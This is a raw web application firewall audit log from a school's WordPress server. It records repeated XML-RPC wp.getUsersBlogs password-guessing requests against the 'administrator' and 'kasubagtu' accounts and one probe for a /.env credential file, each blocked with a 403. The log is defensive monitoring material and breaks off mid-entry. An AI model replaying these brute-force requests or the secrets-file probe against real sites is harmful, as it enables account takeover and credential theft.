smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f738644-C-- wp.getUsersBlogs kasubagtu marketing2012_ --5f738644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f738644-E-- --5f738644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286428372019 5583 (- - -) Stopwatch2: 1749286428372019 5583; combined=4019, p1=509, p2=3257, p3=0, p4=0, p5=143, sr=88, sw=110, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f738644-Z-- --5637c933-A-- [07/Jun/2025:15:54:48 +0700] aEP-WBK9gc79coX6mHSUpgAAAFQ 103.236.140.4 47876 103.236.140.4 8181 --5637c933-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5637c933-C-- wp.getUsersBlogs kasubagtu bonnie --5637c933-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5637c933-E-- --5637c933-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286488278127 5840 (- - -) Stopwatch2: 1749286488278127 5840; combined=4126, p1=499, p2=3420, p3=0, p4=0, p5=119, sr=94, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5637c933-Z-- --f499c812-A-- [07/Jun/2025:15:55:49 +0700] aEP-lWCOO9DrcKL2J_4EuQAAAM8 103.236.140.4 50110 103.236.140.4 8181 --f499c812-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f499c812-C-- wp.getUsersBlogs kasubagtu hello123 --f499c812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f499c812-E-- --f499c812-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286549779728 5524 (- - -) Stopwatch2: 1749286549779728 5524; combined=3992, p1=389, p2=3405, p3=0, p4=0, p5=114, sr=66, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f499c812-Z-- --03e17e52-A-- [07/Jun/2025:15:56:49 +0700] aEP-0RK9gc79coX6mHSViwAAAEQ 103.236.140.4 52272 103.236.140.4 8181 --03e17e52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --03e17e52-C-- wp.getUsersBlogs kasubagtu mypassword --03e17e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e17e52-E-- --03e17e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286609024879 5689 (- - -) Stopwatch2: 1749286609024879 5689; combined=4233, p1=493, p2=3548, p3=0, p4=0, p5=111, sr=85, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e17e52-Z-- --39e4e348-A-- [07/Jun/2025:15:57:49 +0700] aEP_DZANhDjQAvBdMyHmtAAAAJc 103.236.140.4 54380 103.236.140.4 8181 --39e4e348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --39e4e348-C-- wp.getUsersBlogs kasubagtu zxcvb --39e4e348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e4e348-E-- --39e4e348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (109+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286669339201 5671 (- - -) Stopwatch2: 1749286669339201 5671; combined=3942, p1=482, p2=3213, p3=0, p4=0, p5=144, sr=91, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e4e348-Z-- --c4dbfa7a-A-- [07/Jun/2025:15:58:14 +0700] aEP_JmCOO9DrcKL2J_4GXwAAAMc 103.236.140.4 55270 103.236.140.4 8181 --c4dbfa7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c4dbfa7a-C-- wp.getUsersBlogs kasubagtu 1234%^&* --c4dbfa7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4dbfa7a-E-- --c4dbfa7a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286694362408 5463 (- - -) Stopwatch2: 1749286694362408 5463; combined=3646, p1=441, p2=3033, p3=0, p4=0, p5=102, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4dbfa7a-Z-- --2120570e-A-- [07/Jun/2025:15:58:49 +0700] aEP_SWCOO9DrcKL2J_4GkgAAAMs 103.236.140.4 56358 103.236.140.4 8181 --2120570e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2120570e-C-- wp.getUsersBlogs kasubagtu Aa123456. --2120570e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2120570e-E-- --2120570e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286729271979 5308 (- - -) Stopwatch2: 1749286729271979 5308; combined=3826, p1=491, p2=3162, p3=0, p4=0, p5=101, sr=104, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2120570e-Z-- --cd884f6c-A-- [07/Jun/2025:15:59:49 +0700] aEP_hWCOO9DrcKL2J_4HAQAAAM8 103.236.140.4 58494 103.236.140.4 8181 --cd884f6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd884f6c-C-- wp.getUsersBlogs kasubagtu angel --cd884f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd884f6c-E-- --cd884f6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286789139015 5362 (- - -) Stopwatch2: 1749286789139015 5362; combined=3728, p1=501, p2=3032, p3=0, p4=0, p5=111, sr=149, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd884f6c-Z-- --97098a58-A-- [07/Jun/2025:16:00:50 +0700] aEP_wpANhDjQAvBdMyHoWgAAAIQ 103.236.140.4 60336 103.236.140.4 8181 --97098a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --97098a58-C-- wp.getUsersBlogs administrator administrator@ --97098a58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97098a58-E-- --97098a58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286850405878 5357 (- - -) Stopwatch2: 1749286850405878 5357; combined=3695, p1=469, p2=3060, p3=0, p4=0, p5=98, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97098a58-Z-- --dd4e2414-A-- [07/Jun/2025:16:01:50 +0700] aEP__hK9gc79coX6mHSYWQAAAEo 103.236.140.4 33668 103.236.140.4 8181 --dd4e2414-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 239 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dd4e2414-C-- wp.getUsersBlogs administrator smkn22-jkt.sch123456 --dd4e2414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd4e2414-E-- --dd4e2414-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286910617748 5185 (- - -) Stopwatch2: 1749286910617748 5185; combined=3911, p1=461, p2=3264, p3=0, p4=0, p5=108, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd4e2414-Z-- --5ecf8038-A-- [07/Jun/2025:16:02:50 +0700] aEQAOhK9gc79coX6mHSY2gAAAE0 103.236.140.4 35644 103.236.140.4 8181 --5ecf8038-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5ecf8038-C-- wp.getUsersBlogs administrator administrator1999 --5ecf8038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ecf8038-E-- --5ecf8038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286970360097 5685 (- - -) Stopwatch2: 1749286970360097 5685; combined=4132, p1=653, p2=3305, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ecf8038-Z-- --694b203a-A-- [07/Jun/2025:16:03:50 +0700] aEQAdhK9gc79coX6mHSZegAAAFc 103.236.140.4 37688 103.236.140.4 8181 --694b203a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --694b203a-C-- wp.getUsersBlogs administrator marketing2019 --694b203a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --694b203a-E-- --694b203a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287030379688 5133 (- - -) Stopwatch2: 1749287030379688 5133; combined=3676, p1=449, p2=3058, p3=0, p4=0, p5=101, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694b203a-Z-- --2b91ab1f-A-- [07/Jun/2025:16:04:50 +0700] aEQAsmCOO9DrcKL2J_4JhAAAAMY 103.236.140.4 39734 103.236.140.4 8181 --2b91ab1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2b91ab1f-C-- wp.getUsersBlogs administrator smkn22-jkt-sch-id@ --2b91ab1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b91ab1f-E-- --2b91ab1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287090003690 5290 (- - -) Stopwatch2: 1749287090003690 5290; combined=3563, p1=430, p2=2944, p3=0, p4=0, p5=110, sr=78, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b91ab1f-Z-- --829c4812-A-- [07/Jun/2025:16:05:33 +0700] aEQA3ZANhDjQAvBdMyHquwAAAJM 103.236.140.4 41192 103.236.140.4 8181 --829c4812-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.229.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.229.226 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --829c4812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --829c4812-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749287133881797 1182 (- - -) Stopwatch2: 1749287133881797 1182; combined=324, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --829c4812-Z-- --ac32d367-A-- [07/Jun/2025:16:05:50 +0700] aEQA7hK9gc79coX6mHSaqAAAAEU 103.236.140.4 41750 103.236.140.4 8181 --ac32d367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac32d367-C-- wp.getUsersBlogs administrator admin098123 --ac32d367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac32d367-E-- --ac32d367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (121+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287150405731 5784 (- - -) Stopwatch2: 1749287150405731 5784; combined=4054, p1=548, p2=3343, p3=0, p4=0, p5=96, sr=90, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac32d367-Z-- --d94d850b-A-- [07/Jun/2025:16:06:50 +0700] aEQBKpANhDjQAvBdMyHrjwAAAJI 103.236.140.4 43772 103.236.140.4 8181 --d94d850b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d94d850b-C-- wp.getUsersBlogs administrator Internet --d94d850b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d94d850b-E-- --d94d850b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287210220009 5197 (- - -) Stopwatch2: 1749287210220009 5197; combined=4113, p1=486, p2=3405, p3=0, p4=0, p5=128, sr=101, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94d850b-Z-- --08eeff18-A-- [07/Jun/2025:16:07:27 